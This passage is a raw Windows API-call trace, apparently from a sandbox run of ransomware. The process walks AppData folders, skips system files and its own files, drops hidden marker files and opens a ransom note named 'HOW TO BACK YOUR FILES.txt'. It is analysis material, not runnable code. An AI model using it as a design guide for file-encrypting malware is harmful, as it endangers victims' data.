[0050.159] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="bootmgr") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="pagefile.sys") returned -1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="boot") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="ids.txt") returned 1 [0050.159] lstrcmpiW (lpString1="Java", lpString2="NTUSER.DAT") returned -1 [0050.159] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="Java" | out: lpString1="Java") returned="Java" [0050.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0050.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x52) returned 0xc7a2e8 [0050.159] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66528 [0050.159] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0050.159] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0050.159] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.160] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.161] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.161] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.161] CloseHandle (hObject=0x260) returned 1 [0050.161] CloseHandle (hObject=0x2ac) returned 1 [0050.161] GetCurrentThreadId () returned 0xfa8 [0050.161] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0050.161] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" [0050.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a2e8 | out: hHeap=0xc50000) returned 1 [0050.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0050.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java" [0050.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\" [0050.162] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3" [0050.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.164] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.167] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.169] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.169] CloseHandle (hObject=0x2ac) returned 1 [0050.170] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java") returned 40 [0050.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.170] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82ebe936, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0050.170] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.170] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.170] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.170] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.170] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82ebe936, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.170] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.170] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.170] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.170] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82ebe936, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82ebe936, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82ebe936, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.170] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.170] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.170] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2="Tiger4444.exe") returned -1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2=".") returned 1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2="..") returned 1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2="windows") returned -1 [0050.170] lstrcmpiW (lpString1="Deployment", lpString2="bootmgr") returned 1 [0050.171] lstrcmpiW (lpString1="Deployment", lpString2="pagefile.sys") returned -1 [0050.171] lstrcmpiW (lpString1="Deployment", lpString2="boot") returned 1 [0050.171] lstrcmpiW (lpString1="Deployment", lpString2="ids.txt") returned -1 [0050.171] lstrcmpiW (lpString1="Deployment", lpString2="NTUSER.DAT") returned -1 [0050.171] lstrcpyW (in: lpString1=0x30aeafa, lpString2="Deployment" | out: lpString1="Deployment") returned="Deployment" [0050.171] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0050.171] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x68) returned 0xc7a2e8 [0050.171] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66348 | out: ListHead=0xc66828, ListEntry=0xc66348) returned 0xc66528 [0050.171] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 0 [0050.171] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0050.171] lstrcpyW (in: lpString1=0x30aeafa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.173] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.173] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.173] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.173] CloseHandle (hObject=0x260) returned 1 [0050.174] CloseHandle (hObject=0x2ac) returned 1 [0050.174] GetCurrentThreadId () returned 0xfa8 [0050.174] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66348 [0050.174] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" [0050.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a2e8 | out: hHeap=0xc50000) returned 1 [0050.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0050.174] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment" [0050.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\" [0050.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" [0050.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\deployment\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.175] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.179] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.180] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.181] CloseHandle (hObject=0x2ac) returned 1 [0050.181] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment") returned 51 [0050.181] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82ebe936, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0050.181] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.181] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.182] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.182] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82ebe936, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.182] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.182] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.182] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.182] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82ebe936, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82ebe936, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82ee4c56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.182] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82ebe936, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82ebe936, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82ee4c56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0050.182] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0050.182] lstrcpyW (in: lpString1=0x30aeb10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.182] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\Java\\Deployment\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun\\java\\deployment\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.183] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.183] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.184] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.184] CloseHandle (hObject=0x260) returned 1 [0050.184] CloseHandle (hObject=0x2ac) returned 1 [0050.184] GetCurrentThreadId () returned 0xfa8 [0050.184] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0050.184] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0050.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0050.184] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0050.184] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0050.184] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\" [0050.184] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3" [0050.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.185] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.188] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.189] CloseHandle (hObject=0x2ac) returned 1 [0050.190] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned 37 [0050.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.190] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x82ee4c56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0050.190] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.190] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.190] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.190] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.190] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x82ee4c56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.190] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.190] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.190] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.190] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.190] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.190] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82ee4c56, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82ee4c56, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82ee4c56, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.191] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.191] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.191] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="Tiger4444.exe") returned -1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2=".") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="..") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="windows") returned -1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="bootmgr") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="pagefile.sys") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="boot") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="ids.txt") returned 1 [0050.191] lstrcmpiW (lpString1="RootTools", lpString2="NTUSER.DAT") returned 1 [0050.191] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="RootTools" | out: lpString1="RootTools") returned="RootTools" [0050.191] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0050.191] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc611e0 [0050.191] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66568 [0050.191] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RootTools", cAlternateFileName="ROOTTO~1")) returned 0 [0050.191] FindClose (in: hFindFile=0xc730c8 | out: 